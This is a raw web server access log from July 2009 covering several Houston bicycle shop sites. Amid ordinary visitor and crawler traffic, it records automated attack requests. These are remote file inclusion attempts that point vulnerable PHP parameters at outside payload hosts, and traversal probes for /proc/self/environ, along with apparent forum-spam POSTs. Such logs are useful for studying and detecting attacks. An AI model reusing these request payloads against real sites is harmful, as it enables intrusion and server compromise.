91.121.150.170 - - [10/Jul/2009:15:25:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:15:28:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
193.47.80.45 - - [10/Jul/2009:15:30:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [10/Jul/2009:15:30:12 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
208.96.54.72 - - [10/Jul/2009:15:30:41 -0700] "GET /bullitinboard/viewtopic.php?p=15375 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:15:31:43 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:15:37:34 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:15:44:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
194.8.75.94 - - [10/Jul/2009:15:44:34 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.svbikes.com"
194.8.75.94 - - [10/Jul/2009:15:44:35 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.svbikes.com"
194.8.75.94 - - [10/Jul/2009:15:44:35 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Opera/7.11 (Windows NT 5.1; U) [en]" "www.svbikes.com"
65.55.106.171 - - [10/Jul/2009:15:50:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jul/2009:15:51:44 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:15:51:45 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:15:51:46 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:15:51:47 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
211.172.232.95 - - [10/Jul/2009:15:52:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [10/Jul/2009:15:52:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [10/Jul/2009:15:52:03 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:16:47:03 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:16:47:04 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:16:47:04 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:16:47:04 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:16:47:05 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
98.198.91.31 - - [10/Jul/2009:16:48:07 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:48:08 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:48:14 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:48:18 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:48:18 -0700] "GET /images/fit2.gif HTTP/1.0" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:48:18 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:08 -0700] "GET /contactus.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:11 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:11 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:16 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:19 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:22 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:25 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:28 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:30 -0700] "GET /blog/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:33 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:36 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:36 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:39 -0700] "GET /index.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:42 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:42 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.198.91.31 - - [10/Jul/2009:16:51:47 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
65.55.51.69 - - [10/Jul/2009:17:05:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:27 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:32 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:38 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:40 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:42 -0700] "GET /blog/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:46 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
98.201.103.161 - - [10/Jul/2009:17:14:50 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5" "www.svbikes.com"
208.80.195.38 - - [10/Jul/2009:17:43:05 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar 4.3.5.0; FunWebProducts; SpamBlockerUtility 4.8.4)" "bicyclestoreshouston.com"
211.174.63.122 - - [10/Jul/2009:17:43:21 -0700] "GET /appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.174.63.122 - - [10/Jul/2009:17:43:21 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.174.63.122 - - [10/Jul/2009:17:43:21 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:17:45:43 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.171 - - [10/Jul/2009:17:58:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jul/2009:18:14:46 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:18:14:47 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:18:17:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.89.135 - - [10/Jul/2009:18:23:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.89.135 - - [10/Jul/2009:18:23:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.89.135 - - [10/Jul/2009:18:23:42 -0700] "GET /translations/French.txt//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.89.135 - - [10/Jul/2009:18:25:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.89.135 - - [10/Jul/2009:18:25:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.89.135 - - [10/Jul/2009:18:25:52 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.89.135 - - [10/Jul/2009:18:25:56 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:18:26:23 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.89.135 - - [10/Jul/2009:18:30:57 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.89.135 - - [10/Jul/2009:18:30:57 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:18:32:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:18:58:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:18:59:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs/access.log//errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs//errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs/access.log/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
207.210.89.18 - - [10/Jul/2009:19:01:18 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
206.54.216.35 - - [10/Jul/2009:19:01:28 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.svbikes.com"
206.54.216.35 - - [10/Jul/2009:19:01:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.svbikes.com"
206.54.216.35 - - [10/Jul/2009:19:01:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.svbikes.com"
65.55.211.74 - - [10/Jul/2009:19:05:20 -0700] "GET /?D=D HTTP/1.1" 200 1764 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:19:08:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:19:08:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:19:14:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:19:14:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.106.172 - - [10/Jul/2009:19:29:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jul/2009:19:31:28 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:19:31:29 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:19:31:29 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:19:31:30 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:19:31:30 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:19:36:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:19:45:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:19:57:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.51.70 - - [10/Jul/2009:20:30:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
68.146.36.91 - - [10/Jul/2009:20:45:15 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.2; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.svbikes.com"
68.146.36.91 - - [10/Jul/2009:20:45:16 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.2; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.648)" "www.svbikes.com"
65.55.51.114 - - [10/Jul/2009:20:54:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
